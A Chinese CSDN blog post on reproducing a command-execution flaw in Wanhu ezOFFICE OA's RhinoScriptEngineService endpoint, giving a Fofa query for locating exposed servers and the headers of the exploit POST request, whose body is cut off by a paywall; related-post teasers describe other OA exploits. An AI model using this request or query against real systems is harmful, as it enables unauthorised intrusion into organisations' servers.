万户OA RhinoScriptEngineService 命令执行漏洞

已于 2024-03-10 18:15:56 修改
阅读量88 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-10 18:15:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136606024
版权

简介

OA ezoffice是万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品。

漏洞描述

万户ezOFFICE协同管理平台 RhinoScriptEngineService 接口存在命令执行漏洞,该漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。

影响版本

万户ezOFFICE协同管理平台
Fofa:

app="万户网络-ezOFFICE"

漏洞复现

POST //defaultroot/services/./././RhinoScriptEngineService HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: '""'
Content-Length: 1211

<?xml version='1.0' encoding='UTF-8'?
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
通达OA sql注入漏洞.zip
08-24
已实现漏洞验证脚本
泛微e-cology OA Beanshell组件远程代码执行漏洞批量检测脚本
09-26
对2019年9月新爆的泛微e-cology OA Beanshell组件远程代码执行漏洞进行漏洞检测。 使用方法: 1、运行url存活检测脚本e-cology_OA_rce.py批量定位泛微OA业务。 e-cology_OA_rce.py –t 1.txt 2、运行检测脚本判断是否可以拿权限。oa_check.py http://ip:port whoami
万户OA协同办公平台介绍.docx
05-26
万户OA协同办公平台介绍
通达OA前台任意用户登录漏洞.md
09-07
通达OA漏洞合集
万户OA-RhinoScriptEngineService命令执行
最新发布
weixin_43567873的博客
03-06 21
万户OA-RhinoScriptEngineService命令执行
万户ezoffice RhinoScriptEngineService接口rce
qq_36334672的博客
03-05 322
万户ezoffice RhinoScriptEngineService接口存在rce漏洞,可以直接控制服务器。
万户OA漏洞分析、利用与防护
不忘初心,护天下安全!
09-29 3301
万户OA 除了 /defaultroot/officeserverservlet 接口外的另一处接口 OfficeServer.jsp 同时也存在任意文件上传漏洞,导致攻击者可上传任意文件获取服务器权限。万户OA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。万户OA download_old.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。2.使用防火墙等设备对所有相关poc进行检测、防护。可直接上传恶意jsp文件。
万户oa漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-25 2152
万户oa漏洞复现:万户oa漏洞详情 /defaultroot/officeserverservlet 路径存在文件上传漏洞 万户oa漏洞复现 POST /defaultroot/officeserverservlet HTTP/1.1 Host: XXXXXXXXX:7001 Content-Length: 782 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://XXXXXXXX7001 User-Agent
万户OA upload任意文件上传漏洞复现
0xSec
11-20 1171
万户ezOFFICE协同管理平台upload接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,造成代码执行或服务器失陷。
万户OA ezOffice RhinoScriptEngineService 命令执行漏洞-1day未公开漏洞
weixin_43167326的博客
02-26 428
万户OA RhinoScriptEngineService接口存在命令执行漏洞,此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
万户ezOFFICE数据字典
04-02
万户ezOFFICE数据字典
通达OA v11.6 insert SQL注入漏洞.md
09-07
通达OA漏洞合集
万户OA text2Html接口存在任意文件读取漏洞
3tefanie丶zhou的博客
12-19 727
【一个人要有多少血性才算是个好人?】
泛微OA系统多版本存在命令执行漏洞
热门推荐
Sylon的博客
10-30 1万+
0x01漏洞描述 泛微OA办公系统是一款协调办公软件。 泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。 0x02漏洞危害 攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。 0x03影响范围 泛微 e-cology<=9.0 0x04漏洞复现 访问http://url/weaver/bsh.servlet.BshServlet...
【1day】​万户协同办公平台 ezoffice未授权访问漏洞学习
记录并分享学习安全的知识点..
09-08 658
万户协同办公平台是一款企业级的协同办公软件,旨在帮助企业提高工作效率和协同能力。该平台提供了多种功能模块,包括日程管理、任务管理、文档管理、邮件管理、审批流程等,支持多人协同操作和实时沟通。万户协同办公平台 ezoffice存在未授权访问漏洞,攻击者可以接口获得系统登录账号和用MD5加密的密码,登入后台。
万户OA某接口存在RCE漏洞-0day未公开漏洞
weixin_43167326的博客
02-02 339
万户软件网络是业内普遍认可的智慧政务办公专家,OA系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。
万户协同办公平台 ezoffice未授权访问漏洞
xiaokp7的博客
09-13 688
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户ezoffice协同管理平台存在未授权访问漏洞,攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码。
漏洞复现】万户协同办公平台未授权访问漏洞
失心少年
08-29 446
万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能,它以工作流引擎为底层服务,以通讯沟通平台为交流手段,以门户自定义平台为信息推送显示平台,为用户提供集成的协同工作环境。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!
万户oa officeserver.jsp任意文件上传漏洞复现
12-22
总的来说,要防范万户OA officeserver.jsp任意文件上传漏洞,就需要管理员有意识地加强对系统的安全防护,加强对漏洞的排查和修复,以及加强对系统的监控和审计。这样才能更好地保护系统和信息安全

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值